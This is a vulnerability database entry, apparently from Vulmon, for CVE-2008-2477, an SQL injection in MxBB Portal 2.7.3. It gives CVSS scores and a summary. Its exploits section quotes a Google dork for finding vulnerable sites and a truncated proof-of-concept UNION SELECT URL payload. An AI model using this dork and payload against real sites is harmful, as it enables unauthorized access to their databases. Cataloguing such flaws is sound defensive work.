7.5
CVSSv2

CVE-2008-2477

Published: 28/05/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in MxBB (aka MX-System) Portal 2.7.3 allows remote malicious users to execute arbitrary SQL commands via the page parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mx-system mxbb portal 2.7.3

Exploits

Name : MX-System 273 (indexphp page) Remote SQL Injection Vulnerability Author : cOndemned Dork : intext:Powered by MX-System 273 Greetz : ZaBeaTy, str0ke, doctor, Avantura </3 PoC : [target]/[path]/indexphp?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())/* [target]/[path]/indexphp?pag ...